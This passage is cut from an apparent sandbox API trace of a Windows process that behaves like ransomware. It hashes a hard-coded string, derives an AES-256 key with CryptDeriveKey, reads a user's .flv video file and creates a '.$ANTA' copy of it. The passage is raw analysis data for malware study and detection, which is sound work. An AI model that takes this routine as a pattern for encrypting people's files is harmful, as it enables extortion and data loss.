dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0100.473] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0100.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0100.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0100.473] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.473] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca748, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0100.473] CryptHashData (hHash=0x41ac780, pbData=0x17e28a8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0100.473] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.473] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0100.473] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0100.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca580, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0100.473] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac780, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac2c0) returned 1 [0100.473] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.473] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796f08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0100.474] CryptDestroyHash (hHash=0x41ac780) returned 1 [0100.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0100.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eada8 [0100.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0100.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0100.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0100.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0100.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0100.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0100.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0100.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0100.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0100.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0100.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0100.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0100.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0100.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0100.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0100.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0100.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0100.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0100.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e95f0 [0100.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0100.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0100.475] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0100.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0100.475] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0100.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0100.475] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0100.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0100.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0100.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0100.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0100.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0100.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0100.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0100.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0100.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0100.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0100.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0100.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0100.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0100.475] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\wJA95KXdyH.flv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\wja95kxdyh.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0100.475] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.475] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0100.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0100.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0100.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0100.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0100.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0100.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0100.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0100.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0100.476] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0100.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0100.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0100.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0100.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0100.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0100.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0100.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0100.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0100.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0100.476] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0100.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0100.476] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0100.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0100.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0100.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0100.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0100.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0100.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0100.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0100.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0100.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0100.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0100.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0100.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0100.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0100.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0100.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0100.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0100.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0100.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0100.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0100.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0100.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0100.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0100.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0100.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0100.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0100.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0100.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0100.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0100.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5030 [0100.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0100.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369c10 [0100.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0100.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369cc0 [0100.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5030 | out: hHeap=0x1780000) returned 1 [0100.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0100.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0100.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0100.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0100.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0100.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369c10 | out: hHeap=0x1780000) returned 1 [0100.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0100.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0100.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0100.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0100.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0100.478] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc")) returned 0x10 [0100.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0100.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0100.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369cc0 | out: hHeap=0x1780000) returned 1 [0100.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0100.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0100.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0100.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0100.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0100.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0100.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0100.478] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\wJA95KXdyH.flv.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\wja95kxdyh.flv.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0100.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0100.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0100.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0100.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0100.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0100.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0100.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0100.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0100.479] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0100.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0100.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0100.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0100.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0100.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0100.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0100.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0100.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0100.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0100.480] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0100.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0100.480] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0100.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0100.480] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0100.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0100.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0100.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0100.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0100.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0100.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0100.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0100.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0100.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0100.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0100.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0100.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0100.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0100.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0100.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0100.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0c020 [0100.483] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0100.483] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x400f, lpOverlapped=0x0) returned 1 [0100.484] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0100.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0100.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0100.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0100.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0100.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x400f) returned 0x4516010 [0100.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0c020 | out: hHeap=0x1780000) returned 1 [0100.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0100.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0100.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0100.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0100.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0100.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x400f) returned 0x451a028 [0100.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0100.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0100.488] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0100.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0100.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0100.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0100.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0100.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0100.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x400f) returned 0x4516010 [0100.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0100.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0100.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0100.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0100.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0100.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0100.488] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0100.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0100.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0100.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0100.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0100.489] HeapFree (in: hHeap=0x1780000, 